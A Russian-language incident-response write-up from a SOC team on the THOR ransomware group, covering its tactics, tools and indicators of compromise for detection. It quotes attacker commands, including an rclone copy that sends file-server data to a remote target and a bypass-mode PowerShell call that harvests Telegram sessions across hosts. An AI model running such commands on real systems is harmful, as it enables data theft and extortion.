Всем привет!
На связи отдел реагирования и цифровой криминалистики Angara SOC.
Мы нечасто публикуем разборы — работы по реагированию обычно остаются за кадром. Но сразу в нескольких последних инцидентах мы столкнулись с группировкой THOR: несмотря на то, что используемые ею методы не отличаются высокой сложностью, атаки этой группы ранее почти не освещались в открытых источниках.
В этом посте — ключевые тактики, инструменты и индикаторы компрометации, которые помогут обнаружить их атаки. Итак...
Опять оно, или очередные LockBit и Babuk
В проведенных расследованиях, первоначальной точкой доступа являлся публично доступный RDP. Чаще всего, при таком векторе, речи не идет о точечных целевых атаках и конкретных отраслях. Тем не менее, в одном из случаев, для подключения использовались учетные данные сотрудника подрядной организации. Подтвердить факт, что мы имеем дело с полноценным Trusted Relationship не удалось, так как отдельно инфраструктура подрядчика не изучалась. В качестве источников подключения выступали IP-адреса, относящиеся к пулам Whoer VPN.
На этапе разведки атакующие применяют инструмент ADRecon (пример расположения вывода: C:\Program Files (x86)\Kaspersky Lab\ADRecon-Report-%datettime%), собирая информацию о целевом домене, а также нативные системные утилиты. Атакующие также анализируют события входящих RDP-подключений EventID 1149 на предмет новых данных как о машинах внутренней сети, так и имен подключавшихся пользователей:
powershell
Get-WinEvent "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" -ComputerName [имя системы] |
?{$_.ID -eq "1149"} | %{
New-Object PSObject -Property @{
MachineName = $_.MachineName
TimeCreated = $_.TimeCreated
User = $_.Propertioes[0].Value
Domain = $_.Propertioes[1].Value
SourceIP = $_.Propertioes[2].Value
}
}
Продвижение по сети осуществлялось при помощи протокола RDP, WinRM и утилиты NetExec (nxc)
Для обеспечения персистентного доступа в инфраструктуру атакующими используются MeshAgent и Tactical RMM, закрепленные в виде служб. На некоторых системах атакующие создают локальные учетные записи с правами администратора и действуют уже из-под них, например, запускают mimikatz (C:\Program Files\Kaspersky Lab\x64\mimikatz.exe) для получения дополнительного аутентификационного материала.
Перед тем как начать шифрование, атакующие выгружают данные c сетевых дисков и файловых серверов, используя утилиту rclone (C:\Users\Public\rclone.exe):
rclone copy "[путь к выгружаемому сетевому каталогу]" [config-string]:"[/upload/<>]" —ignore-existing
Также, в рамках сбора данных, атакующие используют PowerShell-сценарий, который собирает Telegram-сессии со списка хостов в инфраструктуре:
powershell
powershell -ex bypass -f ArchiveTelegramData.ps1 -HostFile <Host List> -OutputFile <REDACTED>
Ранее мы неоднократно упоминали о мерах безопасности своего аккаунта.
В своих кампаниях THOR используют программы-вымогатели семейства LockBit (Windows) и Babuk (ESXi). Доступность билдера и исходного кода данных программ-вымогателей существенно снизила порог входа для злоумышленников, что привело к резкому росту числа подобных атак.
Распространение вредоносных программ реализовано через групповые политики, в которые запускают запланированные задачи CopyTExe, RunTExe и Schedule share. Сама политика создается соответствующими PowerShell-сценариями. Пример записки — на прикрепленном скриншоте. Именования записок остаются по умолчанию, но текст приводится с говорящим заголовком:
We are #======THOR======#
Инструментарий
psexec, secretsdump, mimikatz, tacticalrmm, MeshAgent, CVE-2020-1472 (zerologon), nxc (NetExec), LeagueDumper, srv_analyze.ps1, сценарии для создания вредоносных GPO – gpo.ps1, deploy.ps1
Индикаторы компрометации
185.227.108.125
104.244.74.175
66.23.199.170
178.20.45.203
192.121.171.245
192.121.113.123
82.118.22.79
mesh.adcloudtest.com
api.adcloudtest.com
icanhazip.tacticalrmm.io
agents.tacticalrmm.com
Имена запланированных задач
Schedule share
RunTExe
CopyTExe
19.08.2025
